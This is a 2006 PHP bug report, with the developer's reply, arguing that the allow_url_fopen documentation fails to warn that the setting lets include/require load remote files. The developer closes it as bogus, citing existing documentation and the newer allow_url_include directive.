| colder@php.net 2006-06-24, 8:03 am |
| ID: 37874
Updated by: colder@php.net
Reported By: Harry dot Boeck at t-online dot de
-Status: Open
+Status: Bogus
Bug Type: Documentation problem
Operating System: all
PHP Version: Irrelevant
New Comment:
I fail to see where the documentation was not enough precise.
If you read http://php.net/ref.filesystem#ini.allow-url-fopen
or http://php.net/features.remote-files.
It's clearly stated that this directive affects the possibility to use
URL wrappers. Thus, every functions allowed to use such wrappers (or
URL-aware) will be affected.
Notice that the configuration directive "allow_url_include" exists
since PHP 6, to adress this very "security problem".
Previous Comments:
------------------------------------------------------------------------
[2006-06-21 12:43:21] Harry dot Boeck at t-online dot de
Description:
------------
allow_url_fopen is incompletely documented concerning effects on file
handling:
This option allows usage of arbitrary files NOT only for file function,
but for every file handling including "include"/"require", circumventing
"include_path" and "doc_root".
This effectively enables the entire internet to execute whatever they
want in the php space on this server. This is a huge security risk.
This is, however, only effective, when some possibility to manipulate
any of the mentioned file operations is already present in the php code
(for example, an argument replacement as "include $somefile").
This in turn is commonly seen not only in open source projects but also
for example in dreamwaver productions.
I have found reports dating from 2004 on the internet, where the risk
is completely documented - but not in the php documentation, where it
should be.
Reproduce code:
---------------
not applying
Expected result:
----------------
There should be a complete description of the vulnaribility at least
either in the configuration file or in the documentation.
Actual result:
--------------
The documentation refers only to the "file system functions" in general
resp. to the "fopen"-function particularly.
Concerning "require", there is only a hint, that inclusion of files was
not possible even with "allow_url_fopen" enabled in earlier versions of
php.
------------------------------------------------------------------------
--
Edit this bug report at http://bugs.php.net/?id=37874&edit=1
|